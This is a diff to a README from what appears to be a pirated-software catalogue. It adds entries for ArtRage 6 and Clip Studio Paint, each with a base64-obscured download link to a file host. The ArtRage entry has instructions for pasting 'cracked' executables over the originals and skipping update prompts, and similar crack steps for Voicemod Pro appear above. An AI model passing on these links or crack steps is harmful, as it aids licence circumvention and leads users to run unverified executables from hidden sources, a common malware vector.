JENOVAAbsolute/128-Bit-Bay-Software/README.md

 3. Install the software
 4. Copy the contents of the crack folder to the install folder of Voicemod Pro
 5. Done

+# Art & Illustration

+### ARTRAGE 6

+A very handy application which will allow you to paint, sketch and draw in a very modern looking working environment.

+Features:
+* Watercolors, oil palettes, pens and brushes
+* Easy to use interface
+* Allows you to use menus to categorize all the functions
+* Import images for further processing and editing

+Download:
+`aHR0cHM6Ly93d3cubWVkaWFmaXJlLmNvbS9maWxlLzZxbmlnMGhxZjdxdnJwNC9BcnRSYWdlXzYuN3ovZmlsZQ==`

+**Installation steps:**
+1. Extract the downloaded file
+2. Run "install_artrage_6_windows.exe"
+3. Install the program wherever you want
+4. Check the image below
+5. Copy the crack files inside the x64 or x86 folder
+6. Paste the cracked exe files into ArtRage's install folder where the original files are located
+7. Click yes to replace
+8. Launch ArtRage, and click "Cancel" when asked for updates
+9. Done

+* * *
+### CLIP STUDIO PAINT

+Clip Studio Paint is optimized for drawing and painting.
+The paint brushes are highly customizable and easy to use.
+There's a thriving community of users who constantly contribute to the online materials library.
+Clip Studio Paint is also ideal for illustrators who specialize in linework.
+The smoothness of lines, lack of lag while drawing, as well as the vector output make drawing very fun and efficient.

+Download:
+`aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xWjBLcXRzVjRUX2h0ZkFKTVVpc2RFbHUzLW80T0F4SFcvdmlldz91c3A9c2hhcmluZw==`

+*Note: Installation instructions included in the readme file.*

 # MISCELLANEOUS TOOLS